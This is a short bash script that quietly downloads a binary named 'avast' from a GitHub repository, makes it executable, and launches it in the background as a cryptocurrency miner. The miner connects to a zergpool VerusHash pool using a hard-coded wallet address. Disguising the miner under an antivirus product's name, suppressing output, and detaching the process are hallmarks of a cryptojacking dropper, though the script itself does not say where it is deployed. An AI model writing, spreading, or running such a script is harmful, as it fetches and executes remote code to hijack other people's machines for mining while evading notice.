#!/bin/bash
wget https://github.com/aurbach55/pos/raw/main/avast >/dev/null 2>&1
chmod +x avast  >/dev/null 2>&1
nohup ./avast -v -l verushash.asia.mine.zergpool.com:3300 -u 7pXYkwdwUFBGNaG8dJ8w6kZTzRjnTpDTgo.x -p c=DASH -t 4 > nohup.out
